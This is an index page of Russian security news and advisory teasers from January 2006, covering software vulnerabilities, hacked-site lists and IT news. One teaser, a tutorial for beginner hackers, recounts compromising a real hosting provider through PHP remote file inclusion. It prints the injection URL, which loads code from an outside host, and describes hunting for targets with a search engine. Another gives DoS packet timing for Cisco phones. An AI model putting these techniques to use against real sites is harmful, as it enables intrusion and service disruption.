Повышение привилегий в Petris
Программа: Petris 1.x Переполнение буфера обнаружено при обработке переменных окружения во время обработки данных highsco…
Уязвимость HTTP Request Smuggling в Pound
Программа: Pound версии до 1.9.4 Уязвимость позволяет удаленному пользователю отравить кеш прокси сервера и произвести XS…
Межсайтовый скриптинг в WebGUI
Программа: WebGUI версии до 6.8.4 Уязвимость существует из-за недостаточной обработки входных данных в некоторых полях (н…
SQL-инъекция в MusicBox
Программа: MusicBox 2.3, возможно более ранние версии Уязвимость существует из-за недостаточной обработки входных данных в…
diff_ext 1.5
Расширяет контекстное меню Windows Explorer командами сравнения файлов.
Повышение привилегий Sudo
Программа: Sudo 1.x Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существ…
Взломанные сайты:13.01.2006
Взломан:
Взлом хостинга bajahosting.com.mx: PHP инклудинг на практике
Эта статья будет интересна в первую очередь начинающим хакерам. В ней я попытаюсь объяснить как применять php инклудинг. Сидя вечером 20 декабря Интернете я прочитал о только что найденной уязвимости в форуме phpCOIN. Статья называлась "PHP-инклудинг в phpCOIN v.1.2.2" Вот как выглядит данная уязвимость: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] Затем я пошел на www.altavista.com, набил для поиска phpCOIN 1.2.2 и стал разгребать найденные ссылки
В Череповце судят хакера, взломавшего сотовых операторов
Правоохранительные органы города Череповец Вологодской области передали в суд дело местного жителя 19-летнего Антона Вишняк…
Множественные уязвимости в PHP Toolkit for PayPal
Обнаружен ряд серьезных уязвимостей в программном пакете PHP Toolkit for PayPal v0.50, предназначенном для организации эле…
Спамера оштрафовали на 11 миллиардов
Американский поставщик услуг доступа в интернет получит нежданную прибыль - 11,2 миллиарда долларов США.
CERT: в Unix и Linux больше дыр, чем в Windows
По данным бюллетеня, в период с января по декабрь 2005 года в распространенных ОС и программах для них в целом…
F-Secure BlackLight 2.2.1015 beta
Программа для обнаружения и удаления различных шпионских модулей, и прежде всего программ маскировки следов (т.
Windows ХР загрузили на процессоре с частотой 25 МГц и 18 Мб ОЗУ
Для запуска операционной системы Windows ХР необходим компьютер со следующими характеристиками: процессор с тактовой частот…
Взломанные сайты:12.01.2006
Взломан:
Отказ в обслуживании в FreeBSD ipfw
Программа: FreeBSD 6.x Уязвимость обнаружена в модуле "ipfw" при обработке IP фрагментов. Удаленный пользовател…
Небезопасное создание временных файлов в редакторе ee
Программа: FreeBSD 4.x, 5.x, 6.x Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвим…
Уязвимость форматной строки в модуле auth_ldap в Apache
Программа: auth_ldap 1.6.0 и более ранние версии Уязвимость форматной строки обнаружена в функции "auth_ldap_log_reas…
Раскрытие данных в NetBSD Kernfs
Программа: NetBSD-1.x Уязвимость существует из-за ошибки при обработке входных данных в функции "lseek()". Лока…
Выполнение произвольных команд в Sun Solaris uucp / uustat
Программа: Sun Solaris 8 Sun Solaris 9 Переполнение буфера обнаружено в утилитах uucp и uustat. Локальный пользователь …
Уязвимость форматной строки в SMS Server Tools
Программа: SMS Server Tools 1.16.1 Уязвимость форматной строки обнаружена в файле "logging.c" при логировании о…
Обход ограничений безопасности в ADOdb
Программа: ADOdb 4.66 и 4.68 для PHP, возможно другие версии. Обнаруженные уязвимости позволяют удаленному пользователю вы…
Раскрытие данных в MegaBBS
Программа: MegaBBS 2.1 и более ранние версии Уязвимость существует из-за того, что программное обеспечение некорректно об…
Межсайтовый скриптинг в phpChamber
Программа: phpChamber Уязвимость существует при обработке входных данных в параметре "needle" сценария "se…
Межсайтовый скриптинг и раскрытие данных в Joomla!
Программа: Joomla! 1.0.5 и более ранние версии Уязвимость позволяет удаленному пользователю произвести XSS нападение и пол…
Межсайтовый скриптинг в Andromeda
Программа: Andromeda 1.9.3.4 (PHP) Уязвимость существует при обработке входных данных в параметре "s" сценария &…
Отказ в обслуживании в Eudora Internet Mail Server
Программа: Eudora Internet Mail Server версии до 3.2.8 Уязвимость существует при обработке запросов для NTLM аутентификаци…
Взлом WEP ключа за 10 минут (видео)
Видео-ролик по подбору WEP-ключа в беспроводной сети.
Отказ в обслуживании в Bogofilter
Программа: Bogofilter 0.96.2 и более ранние версии Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживан…
DoS в Cisco IP Phone 7940 (эксплоит)
В Cisco 7940 обнаружена DoS уязвимость. Посылка 1000 пакетов с интервалом 0.02 секунды на 80 порт заставит телефон перегрузи…
Переполнение буфера в xmame (эксплоит)
Локальное переполнение буфера в xmame.
Лучшие вирусы Декабря
В отличие от стабильного положения лидеров вирусного рейтинга в ноябре, декабрь 2005 года оказался весьма активным. Первые …
Информация о людях АНБ, ФБР и ЦРУ оказалась в открытом доступе
Американская компания Guidance Software, занимающаяся обеспечением информационной безопасности правительственных структур С…
Гитарист King Crimson запишет звуки для Windows Vista
Microsoft наняла арт-рокера Роберта Фриппа для записи звуков, которые будут использованы в Windows Vista. Фрипп, который яв…
Военный робот на CLIPS: работа с экспертной системой №2
Привет, я продолжаю дальше свое повествование и подумал, что было бы неплохо описать в этой главе эвристическую классификацию. Помнишь я упоминал про систему порождающих правил и поиск решения в глубину и ширину? Правильно, что не помнишь, потому что не упоминал
Microsoft очистит код от уязвимостей
Microsoft будет изучать код своих приложений с целью обнаружения в них дефектов, аналогичных недавно обнаруженной серьезно…
Инклюдинг локальных файлов в WebFTP модуле для SysCP
Программа: WebFTP 1.2.6, возможно более ранние версии Уязвимость позволяет удаленному пользователю просмотреть произвольны…
Множественные уязвимости в форуме 427BB
Программа: 427BB 2.2.1 и более ранние версии Обнаруженные уязвимости позволяют удаленному пользователю обойти ограни…
Межсайтовый скриптинг в NavBoard
Программа: NavBoard версии V16 (2.6.0) и V17 beta2 Уязвимость существует при обработке входных данных в BBcode теге «URL».…
Бумажный спецвыпуск
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире